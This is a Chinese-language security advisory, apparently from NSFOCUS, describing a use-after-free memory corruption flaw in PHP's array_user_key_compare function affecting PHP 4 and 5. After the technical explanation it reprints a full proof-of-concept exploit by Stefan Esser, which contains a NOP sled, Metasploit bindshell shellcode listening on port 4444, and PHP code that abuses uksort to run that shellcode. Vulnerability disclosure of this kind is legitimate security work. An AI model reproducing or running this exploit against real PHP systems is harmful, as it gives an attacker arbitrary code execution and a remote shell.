安全研究
安全漏洞
PHP array_user_key_compare函数内存破坏漏洞
发布日期:2007-03-16
更新日期:2007-03-19
受影响系统:
PHP PHP 5 <= 5.2.1描述:
PHP PHP 4 <= 4.4.6
BUGTRAQ ID: 22990
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP的内部函数array_user_key_compare()实现上存在内存破坏漏洞,本地攻击者可能利用此漏洞提升自己权限。
当PHP的uksort()函数调用内部的array_user_key_compare()执行用户域密钥比较时,会从Hashbucket a和b获取ZVAL key1和key2。这些ZVAL会被传送给用户域函数,之后调用zval_dtor()释放。
static int array_user_key_compare(const void *a, const void *b TSRMLS_DC)
{
...
zval key1, key2;
zval *args[2];
...
args[0] = &key1;
args[1] = &key2;
...
status = call_user_function(EG(function_table), NULL, *BG(user_compare_func_name), &retval, 2, args TSRMLS_CC);
zval_dtor(&key1);
zval_dtor(&key2);
...
}
但用户域函数可能创建到所提供密钥的引用,如果使用zval_dtor()释放了这些密钥后的变量,引用就可能指向已经释放的内存,导致各种内存破坏问题。成功利用这个漏洞的攻击者可以本地执行任意指令。
<*来源:Stefan Esser (s.esser@ematters.de)
链接:http://secunia.com/advisories/24542/
http://www.php-security.org/MOPB/MOPB-24-2007.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP 4/5 - array_user_key_compare() ZVAL dtor exploit //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
// You can put in any shellcode you want. Just make sure that the
// shellcode string starts with enough NOP space
// NOPSPACE
$shellcode = str_repeat(chr(0x90), 710);
// A bindshell on port 4444 generated by Metsploit
$shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
"\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
"\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
"\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
"\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
"\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
"\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";
$arr = array(str_repeat("A", 39) => 1, "B" => 1);
function array_compare(&$key1, &$key2)
{
$GLOBALS['a'] = &$key2;
unset($key2);
return 1;
}
uksort($arr, "array_compare");
$x=array($shellcode => 1);
$a[8*4+0] = $a[6*4+0];
$a[8*4+1] = chr(ord($a[6*4+1])+2); // <--- This only works for Little Endian
$a[8*4+2] = $a[6*4+2];
$a[8*4+3] = $a[6*4+3];
unset($x);
?>
建议:
厂商补丁:
PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.php.net
浏览次数:3746
严重程度:0(网友投票)
绿盟科技给您安全的保障